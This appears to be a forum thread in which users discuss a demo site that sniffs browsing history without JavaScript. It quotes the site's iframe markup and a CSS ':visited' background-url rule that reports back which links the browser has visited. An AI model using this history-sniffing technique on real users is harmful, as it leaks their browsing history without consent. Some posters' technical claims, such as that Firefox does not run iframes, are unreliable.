Re: Stealing browser history without JavaScript

Zinco wrote:
Matej Kovacic wrote:
Hi,

this seems an interesting issue:

http://www.making-the-web.com/misc/sites-you-visit/nojs/

bye, Matej

Anon Mus Wrote: Been to this site and it dont work on my firefox.3.0.8 browser... (with NoScript, QuickJava, Better Privacy, JavaScript Deobfuscator, Quick Preference Button & User Agent Switcher)

it replies with a 0 (zero) count. But there should be dozens.

Zinco Wrote:
Seems to me it would have to have all websites known to man on the page
it
loads.  If it looks at "visited links" css on the page it loads it could
only look at websites on that page.  It would have to store a lot of web
pages on that hidden i-frame to really compare.  Unless you are looking
see if a particular person visited a particular page doesn't seem like it
would do anyone much good.

Anon Mus Wrote: Maybe IFrames don't work on Firefox. The pages IFrame message "Please enable Iframes, though" is superfluous, as it only prints if IFrames is functional !!

Reminds me of a security software con site years ago which would print some detail value known only to your browser, up on a web page. Of course, only YOU could see it, no data was sent to the visited web site.

Even though it was a con, lots of people bought the security software to protect themselves from that non-existent leak.

In this IFrames exploit the test web page is said to have a css background image embedded in it. I can find no such image (background: #003399;).
(See http://www.w3schools.com/css/pr_background.asp.)

The only image on the page is a javascript button. But there is a javascript dependent Google Analytics urchin tracker.

Would the author Brendon Bo[mb]shell like to identify him/her self?

Zinco Wrote:

50000 pages isn't very much.  Would have to contain millions it would seem.
It did work on my browser and found 30 of the most popular sites.  Ebay ect.

*************************
Index.php I-Frame
<iframe src="start_scan.php?769245844" width="300" height="260"
frameborder="0" scrolling="no">Please enable Iframes, though</iframe>

<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js";
type="text/javascript"></script> <script type="text/javascript"
src="http://www.reddit.com/button.js?t=1";></script>
*******************************
Start_scan.php I-frame
<iframe src="sites_list.php?sess=fe728e" width="288" height="210"
frameborder="0"></iframe>

<iframe src="base.php?sess=fe728e" width="1" height="1"
frameborder="0"></iframe>
**********************************
Base.php
a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
***************************

So there is the IFrame provisioned background image.

As I couldn't see this "base.php" code, then it pretty much confirms that firefox don't run IFrames.

Obviously the,

"

<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js";
type="text/javascript"></script> <script type="text/javascript"
src="http://www.reddit.com/button.js?t=1";></script>

"
section will only run as javascript.. so "NoScript" takes care of that.